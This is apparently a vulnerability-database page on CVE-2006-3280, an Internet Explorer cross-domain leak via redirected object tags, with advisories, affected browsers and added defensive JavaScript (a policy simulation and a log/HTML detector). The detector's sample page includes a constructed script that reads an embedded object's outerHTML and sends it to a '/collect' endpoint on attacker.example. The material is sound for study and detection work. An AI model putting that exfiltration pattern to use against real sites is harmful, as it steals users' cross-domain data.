CVE-2006-3280
Published 2006-06-28
CVE-2006-3280: Cross-domain vulnerability in Microsoft Internet Explorer 6.0 allows remote attackers to access restricted information from other domains via an object tag…
Priority: P3 (37) · Severity: high · CVSS 2.0 base score: 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P)
Exploit: public PoC available · EPSS: 55.92% (98.9th percentile)
Cross-domain vulnerability in Microsoft Internet Explorer 6.0 allows remote attackers to access restricted information from other domains via an object tag with a data parameter that references a link on the attacker's originating site that specifies a Location HTTP header that references the target site, which then makes that content available through the outerHTML attribute of the object, aka "Redirect Cross-Domain Information Disclosure Vulnerability."
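The description above is all the record says about the mechanism. As an added illustration (this editor's model, not code from the page, from the published PoC or from Microsoft), the block below simulates the decision a browser has to make when an `<object data="...">` load is redirected: the "vulnerable" policy attributes the resulting document to the origin of the URL in the data attribute (the attacker's redirector), the "fixed" policy to the origin of the URL the bytes actually came from. The hostnames, the in-memory responses and the two policy names are constructed; that IE's check failed in exactly this way is an assumption drawn from the description, not something the record states.

```javascript
// Added example (not the page's, the PoC's or Microsoft's code): a minimal model
// of the redirect/origin confusion described for CVE-2006-3280. Hostnames,
// responses and policy names are constructed; the "vulnerable" policy is this
// editor's assumption about what the browser got wrong.

// Constructed in-memory "web": attacker.example serves the embedding page and a
// redirector (r.php); target.example serves a page only its own origin may read.
const WEB = {
  'http://attacker.example/r.php': {
    status: 302,
    headers: { location: 'http://target.example/private' },
    body: '',
  },
  'http://target.example/private': {
    status: 200,
    headers: { 'content-type': 'text/html' },
    body: '<html><body>account balance: 1234</body></html>',
  },
};

const originOf = (url) => new URL(url).origin;

// Follow Location headers the way a browser does when it loads <object data=...>.
function fetchFollowingRedirects(url, maxHops = 5) {
  let current = url;
  for (let hop = 0; hop <= maxHops; hop++) {
    const resp = WEB[current];
    if (!resp) throw new Error(`no response for ${current}`);
    if (resp.status >= 300 && resp.status < 400 && resp.headers.location) {
      current = new URL(resp.headers.location, current).href;
      continue;
    }
    return { requestedUrl: url, finalUrl: current, body: resp.body };
  }
  throw new Error('too many redirects');
}

// Load an <object data="..."> and decide which origin owns the resulting document.
//   'vulnerable': origin taken from the URL in the data attribute (pre-redirect)
//   'fixed':      origin taken from the URL the content actually came from
function loadObject(dataUrl, policy) {
  const res = fetchFollowingRedirects(dataUrl);
  const documentOrigin = policy === 'vulnerable'
    ? originOf(res.requestedUrl)
    : originOf(res.finalUrl);
  return { documentOrigin, finalUrl: res.finalUrl, html: res.body };
}

// Script on the embedding page tries obj.documentElement.outerHTML.
// Returns the markup when the document is same-origin, otherwise null (denied).
function readOuterHTML(embeddingPageOrigin, obj) {
  return obj.documentOrigin === embeddingPageOrigin ? obj.html : null;
}

// The attack shape from the description: attacker page embeds its own r.php,
// which redirects to the target; the page then reads the object's outerHTML.
function demo(policy) {
  const pageOrigin = 'http://attacker.example';
  const obj = loadObject('http://attacker.example/r.php', policy);
  return readOuterHTML(pageOrigin, obj);
}

console.log('vulnerable policy leaks:', demo('vulnerable'));
console.log('fixed policy leaks:     ', demo('fixed'));
```

Under the vulnerable policy the target's markup comes back to attacker-origin script; under the fixed policy the document is attributed to target.example and the read is refused. The same post-redirect rule is what later browsers apply to frames, objects and fetches alike.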
Affected (11 ranges; no version bounds or fixed versions recorded)
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| advanced_search_technologies_inc | enigma_browser | — | — |
| fast_browser | fast_browser | — | — |
| flashpeak | slim_browser | — | — |
| gosurf_browser | gosurf_browser | — | — |
| maxthon | maxthon | — | — |
| microsoft | internet_explorer | — | — |
| more_quick_tools | greenbrowser | — | — |
| myweb4net | myweb4net_browser | — | — |
| netcaptor | netcaptor | — | — |
| phaseout | phaseout | — | — |
| softinform | finebrowser | — | — |
Detection & IOCs (extracted from sources)
- Look for HTML pages that embed an <object> whose data attribute points at an attacker-controlled redirector (e.g. r.php) which answers with a Location header to a cross-domain target, combined with JavaScript that reads outerHTML from that object.
- Flag JavaScript that reads documentElement.outerHTML on an embedded object element; that read is how the exploit exfiltrates the cross-domain page content.
- In proxy or web-server logs, watch for responses from the attacker-controlled server that carry a Location header pointing to a third-party (target) domain where the initial request was an <object data=...> load.
- Caveat: the published proof of concept is described as incomplete; it demonstrates feasibility rather than being a fully weaponized payload.
- Caveat: the vulnerability was confirmed on one platform (Windows Server 2003 Enterprise Edition SP1) and depends on Internet Explorer's cross-domain policy enforcement; detection rules should keep that context in mind.
- Caveat: a similar variant affects Slim Browser 4.07 build 100 (and the other IE-engine browsers listed under GHSA below), so detection logic should not be scoped exclusively to Internet Explorer.
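The three detection ideas above, turned into runnable JavaScript (Node) as an added example that is not from the page or any of the cited advisories: a static check over page HTML plus a correlation over proxy records. The hostnames, the HTML sample, the log record format and the log lines are all constructed for the example; a real proxy logs differently and you would swap in its parser.

```javascript
// Added example, not code from the page or any of its sources: the detection
// ideas in the list above as a static HTML check plus a proxy-log correlation.
// Hostnames, the HTML sample, the log format and the log lines are constructed.

const originOf = (url) => {
  try { return new URL(url).origin; } catch { return null; }
};

// 1. Static page check. The PoC shape is an <object data="..."> pointing at a
//    redirector on the page's OWN origin (e.g. r.php) plus script that reads
//    .outerHTML from the embedded object; flag pages that show both.
function analyseHtml(html, pageUrl) {
  const pageOrigin = originOf(pageUrl);
  const objectRe = /<object\b[^>]*\bdata\s*=\s*["']([^"']+)["'][^>]*>/gi;
  const dataUrls = [...html.matchAll(objectRe)].map((m) => new URL(m[1], pageUrl).href);
  const readsOuterHtml = /\.outerHTML\b/.test(html);
  const sameOriginObjects = dataUrls.filter((u) => originOf(u) === pageOrigin);
  return { dataUrls, readsOuterHtml, suspicious: readsOuterHtml && sameOriginObjects.length > 0 };
}

// 2. Log side. Constructed record format, one response per line:
//    <timestamp> <client> <method> <url> <status> [location=<url>] [referer=<url>]
function parseLogLine(line) {
  const [ts, client, method, url, status, ...rest] = line.trim().split(/\s+/);
  const rec = { ts, client, method, url, status: Number(status), location: null, referer: null };
  for (const kv of rest) {
    const i = kv.indexOf('=');
    if (i > 0) rec[kv.slice(0, i)] = kv.slice(i + 1);
  }
  return rec;
}

// A 3xx whose Location leaves the redirecting origin, requested from a page on
// that same origin (the embedding page loading its own r.php), is the pattern
// from the third bullet. Same-origin redirects (ordinary login flows) are ignored.
function findCrossDomainRedirects(lines) {
  return lines
    .map(parseLogLine)
    .filter((r) =>
      r.status >= 300 && r.status < 400 && r.location !== null &&
      originOf(r.location) !== originOf(r.url) &&
      r.referer !== null && originOf(r.referer) === originOf(r.url))
    .map((r) => ({ ts: r.ts, client: r.client, from: r.url, to: r.location }));
}

// Constructed sample page in the shape the first two bullets describe.
const SAMPLE_HTML = `<html><body>
<object id="o" data="/r.php?u=http://target.example/private" type="text/html"></object>
<script>
  /* constructed stand-in for the PoC's read of the embedded document */
  var o = document.getElementById('o');
  var leaked = o.documentElement.outerHTML;
  new Image().src = '/collect?d=' + encodeURIComponent(leaked);
</script>
</body></html>`;

// Constructed proxy records: one client hits the attacker page, the redirector,
// then the target; a second client goes through an unrelated same-origin redirect.
const SAMPLE_LOG = [
  '2006-06-28T10:00:00Z 10.0.0.5 GET http://attacker.example/index.html 200',
  '2006-06-28T10:00:01Z 10.0.0.5 GET http://attacker.example/r.php?u=x 302 location=http://target.example/private referer=http://attacker.example/index.html',
  '2006-06-28T10:00:01Z 10.0.0.5 GET http://target.example/private 200 referer=http://attacker.example/index.html',
  '2006-06-28T10:00:05Z 10.0.0.7 GET http://shop.example/login 302 location=http://shop.example/account referer=http://shop.example/',
];

console.log(analyseHtml(SAMPLE_HTML, 'http://attacker.example/index.html'));
console.log(findCrossDomainRedirects(SAMPLE_LOG));
```

The static check on its own is noisy (plenty of legitimate pages embed same-origin objects and touch outerHTML); the log correlation is the stronger signal, and the two together, for the same client within a short window, are what you would actually alert on.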
GHSA advisories (all ghsa_unreviewed, published 2022-05-01)

| GHSA | CVE | Product / version | Severity | CVSS |
|---|---|---|---|---|
| GHSA-mvgc-fgw6-3gxx | CVE-2006-3280 | Microsoft Internet Explorer 6.0 | HIGH | — |
| GHSA-6mmm-jx2q-hx92 | CVE-2006-6986 | PhaseOut 5.4.4 | HIGH | 7.5 |
| GHSA-fg3g-q7pq-h8mx | CVE-2006-6987 | FineBrowser Freeware 3.2.2 | HIGH | 7.5 |
| GHSA-x92r-4rhh-jrqc | CVE-2006-6991 | Fast Browser Pro 8.1 | HIGH | 7.5 |
| GHSA-rj75-vrwf-xch7 | CVE-2006-6983 | MYweb4net Browser 3.8.8.0 | HIGH | 7.5 |
| GHSA-pggp-q5j5-59xw | CVE-2006-6990 | Enigma Browser 3.8.8 | HIGH | 7.5 |
| GHSA-2cpp-wgf7-gr4j | CVE-2006-6985 | Maxthon 1.5.6 build 42 | HIGH | 7.5 |
| GHSA-26cp-jrgm-wmvv | CVE-2006-6988 | Slim Browser 4.07 build 100 | HIGH | 7.5 |
| GHSA-63mx-p8f6-gxj7 | CVE-2006-6984 | GreenBrowser 3.4.0622 | HIGH | 7.5 |
| GHSA-7w9c-p2pp-94gm | CVE-2006-6989 | NetCaptor 4.5.7 Personal Edition | HIGH | 7.5 |
| GHSA-894m-5vvh-8f23 | CVE-2006-6992 | GoSuRF Browser 2.62 | HIGH | 7.5 |

Every advisory in the table carries the same description: a cross-domain vulnerability that allows remote attackers to access restricted information from other domains via an object tag with a data parameter that references a link on the attacker's originating site that specifies a Location HTTP header that references the target site, which then makes that content available through the outerHTML attribute of the object. The CVE-2006-698x entries are each recorded as "a similar vulnerability to CVE-2006-3280"; the products are third-party shells built on the Internet Explorer rendering engine, which is why the same bug surfaces in all of them.
No detection rules found.
No writeups or analysis indexed.
References
- http://lists.grok.org.uk/pipermail/full-disclosure/2006-June/047398.html (original Full Disclosure post)
- http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20060627/3d930eda/PLEBO-2006.06.16-IE_ONE_MINOR_ONE_MAJOR.obj (proof-of-concept attachment)
- http://secunia.com/advisories/20825
- http://secunia.com/advisories/21396
- http://secunia.com/internet_explorer_information_disclosure_vulnerability_test
- http://securitytracker.com/id?1016388
- http://www.kb.cert.org/vuls/id/883108 (CERT VU#883108)
- http://www.securityfocus.com/archive/1/438785/100/0/threaded
- http://www.securityfocus.com/archive/1/438788/100/0/threaded
- http://www.securityfocus.com/archive/1/438811/100/0/threaded
- http://www.securityfocus.com/archive/1/438863/100/0/threaded
- http://www.securityfocus.com/archive/1/438864/100/0/threaded
- http://www.securityfocus.com/archive/1/439146/100/0/threaded
- http://www.securityfocus.com/bid/18682 (BID 18682)
- http://www.us-cert.gov/cas/techalerts/TA06-220A.html
- http://www.vupen.com/english/advisories/2006/2553
- http://www.vupen.com/english/advisories/2006/3212
- https://docs.microsoft.com/en-us/security-updates/securitybulletins/2006/ms06-042 (Microsoft bulletin MS06-042, the vendor fix)
- https://exchange.xforce.ibmcloud.com/vulnerabilities/27452
- https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A738